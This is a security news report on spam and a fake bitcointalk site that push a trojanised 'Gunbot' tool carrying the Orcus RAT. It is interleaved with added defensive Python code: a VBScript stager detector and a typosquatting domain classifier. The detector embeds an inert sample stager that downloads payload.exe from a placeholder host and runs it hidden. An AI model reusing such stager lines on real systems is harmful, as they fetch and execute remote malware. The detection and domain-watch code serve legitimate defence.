Fake Gunbot Bitcoin tool spreads Orcus RAT via spam

Spam emails advertising a new Bitcoin trading bot called Gunbot are instead delivering the Orcus remote access trojan (RAT), which is being used to target Bitcoin investors and steal cryptocurrency and other data.

Orcus is advertised as a Remote Administration Tool but offers features that go beyond those of typical RATs, such as the ability to disable the webcam's activity light so the target is not alerted that the camera is in use.

While Gunbot is a real product, the advertisement is fake: the email's malicious attachment is a simple VBScript that, when executed, downloads a Windows PE binary, according to a 7 December Fortinet blog post.
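The attachment described above is a download-and-execute stager: a script that fetches a PE binary and runs it. The following is an added example (not code from the Fortinet post or from the campaign) of a static triage check for that pattern. It scans a constructed, inert VBScript sample for the COM objects such stagers need (HTTP download, binary file write, process execution), extracts any URLs, measures how heavily the script is commented, and separately checks whether a downloaded blob actually carries a PE header. The sample script, its placeholder URL and the fake header bytes are all constructed here for illustration.

```python
import re

# Constructed, inert sample in the style of a VBScript download-and-execute
# stager. It is NOT the script from the campaign; the URL is a placeholder
# under a reserved TLD and the sample is only scanned, never executed.
SAMPLE_VBS = r'''
' Step 1: create the HTTP object
Set http = CreateObject("MSXML2.XMLHTTP")
' Step 2: fetch the payload
http.Open "GET", "http://gunbot-update.example.invalid/payload.exe", False
http.Send
' Step 3: write the response body to disk
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.Write http.responseBody
stream.SaveToFile "C:\Users\Public\gunbot.exe", 2
' Step 4: run it
Set shell = CreateObject("WScript.Shell")
shell.Run "C:\Users\Public\gunbot.exe", 0, False
'''

# Capabilities a download-and-execute stager needs, mapped to the COM
# objects / members that commonly provide them in VBScript.
CAPABILITIES = {
    "http_download": [r"MSXML2\.(Server)?XMLHTTP", r"WinHttp\.WinHttpRequest", r"\.responseBody"],
    "binary_file_write": [r"ADODB\.Stream", r"\.SaveToFile\b", r"Scripting\.FileSystemObject"],
    "process_execution": [r"WScript\.Shell", r"\.Run\b", r"\.Exec\b", r"Shell\.Application"],
}

URL_RE = re.compile(r"""["'](https?://[^"'\s]+)["']""", re.IGNORECASE)
COMMENT_RE = re.compile(r"^\s*(?:'|Rem\b)", re.IGNORECASE)


def triage_vbs(script):
    """Report which stager capabilities a VBScript exhibits, the URLs it
    embeds, and how much of it is comments. A script showing all three
    capabilities behaves like a download-and-execute stager no matter how
    politely it is commented."""
    found = {}
    for cap, patterns in CAPABILITIES.items():
        hits = [p for p in patterns if re.search(p, script, re.IGNORECASE)]
        if hits:
            found[cap] = hits
    urls = URL_RE.findall(script)
    lines = [l for l in script.splitlines() if l.strip()]
    comment_lines = [l for l in lines if COMMENT_RE.match(l)]
    return {
        "capabilities": sorted(found),
        "urls": urls,
        "is_stager": {"http_download", "binary_file_write", "process_execution"} <= set(found),
        "comment_ratio": round(len(comment_lines) / max(len(lines), 1), 2),
    }


def is_pe(data):
    """True if `data` looks like a Windows PE image: an 'MZ' DOS header and
    a 'PE\\0\\0' signature at the offset stored in e_lfanew (bytes 0x3C..0x3F)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


# Constructed minimal header: 'MZ', padding, e_lfanew = 0x40, then 'PE\0\0'.
FAKE_PE_HEADER = b"MZ" + b"\0" * 58 + (0x40).to_bytes(4, "little") + b"PE\0\0"

if __name__ == "__main__":
    print(triage_vbs(SAMPLE_VBS))
    print("downloaded blob is PE:", is_pe(FAKE_PE_HEADER))
```

The capability check is deliberately keyed on what the script must do rather than on strings an author can trivially rename; a stager that obfuscates `CreateObject` arguments would need a second pass (deobfuscation or dynamic execution in a sandbox), which this static check does not attempt.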

Researchers said the threat actors either lacked the technical knowledge and simply bought the components used in the campaign, or had no intention of hiding the malware's behaviour, judging by the comments left in the script, which described each step of the code's execution.

It is also possible that the threat actors do not care about being spotted by some recipients, as long as someone double-clicks the file without properly inspecting its contents.

“At first glance, the downloaded executable appears to be a benign inventory system tool with a lot of references to SQL commands for inventory procedures,” researchers said in the post. “After further analysis, however, we found that it is a trojanised version of an open source inventory system tool named TTJ-Inventory System.”

The threat actors also used a site designed to imitate the Bitcoin forum bitcointalk.org to distribute the malware disguised as the Gunbot tool; that download contains a similarly trojanised "Inventory System" executable as well as the VBScript downloader.

Researchers traced the domain and found it registered to "Cobainin Enterprises", along with other questionable domains registered to the same registrant. Those domains used similar names with individual letters swapped and, when accessed, displayed a "We'll be back soon!" message.
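The lookalike domains described above are the classic typosquatting pattern: a legitimate name with one or two letters replaced. As an added example (not from the Fortinet post, and none of the candidate names below is claimed to be one of the campaign's actual domains), the following script classifies candidate registrations against a watchlist of legitimate names. bitcointalk.org is named in the article; the Gunbot vendor's own domain is not, so only the brand word is used for it. The candidate list is constructed for illustration.

```python
# Legitimate names to protect. bitcointalk.org is from the article; the
# Gunbot vendor domain is not given there, so only the brand token is used.
WATCHLIST = ["bitcointalk.org", "gunbot"]

# Constructed candidate registrations for illustration only.
CANDIDATES = [
    "bitcointalk.org",
    "bitcointaik.org",
    "bitc0intalk.org",
    "bitcointelk.org",
    "bitcointalks.org",
    "gunbot-download.example",
    "bitcoinnews.example",
]

# Characters or pairs that look alike in common fonts; both sides of a
# comparison are normalised with this table so the mapping need not be exact.
HOMOGLYPHS = {"rn": "m", "vv": "w", "0": "o", "1": "l", "i": "l", "5": "s"}


def normalise(name):
    for fake, real in HOMOGLYPHS.items():
        name = name.replace(fake, real)
    return name.lower()


def edit_distance(a, b):
    """Levenshtein distance (insertions, deletions, substitutions)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(candidate, legit, max_distance=2):
    """How `candidate` relates to `legit`: 'identical', 'homoglyph' (letters
    replaced by look-alikes), 'substitution' (same length, a few letters
    swapped), 'edit' (close by edit distance), 'contains-brand', or None."""
    if candidate == legit:
        return "identical"
    if normalise(candidate) == normalise(legit):
        return "homoglyph"
    if len(candidate) == len(legit):
        diffs = sum(a != b for a, b in zip(candidate, legit))
        if diffs <= max_distance:
            return "substitution"
    if edit_distance(candidate, legit) <= max_distance:
        return "edit"
    brand = legit.split(".")[0]
    if brand in candidate:
        return "contains-brand"
    return None


def scan(candidates=CANDIDATES, watchlist=WATCHLIST):
    """Map each suspicious candidate to (legitimate name, verdict). Names
    that resemble nothing on the watchlist are omitted."""
    results = {}
    for cand in candidates:
        for legit in watchlist:
            verdict = classify(cand, legit)
            if verdict:
                results[cand] = (legit, verdict)
                break
    return results


if __name__ == "__main__":
    for cand, (legit, verdict) in scan().items():
        print(f"{cand:28} -> {verdict:15} (imitates {legit})")
```

In practice the candidate list would come from newly observed domains (certificate transparency logs, passive DNS, or registrar feeds); the "We'll be back soon!" placeholder pages the article mentions are a useful secondary signal, since a parked lookalike that later starts serving content is worth a second look.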

Researchers speculate that the threat actors cycle through these sites between malware campaigns, with one of the websites leading to a fake Gunbot site.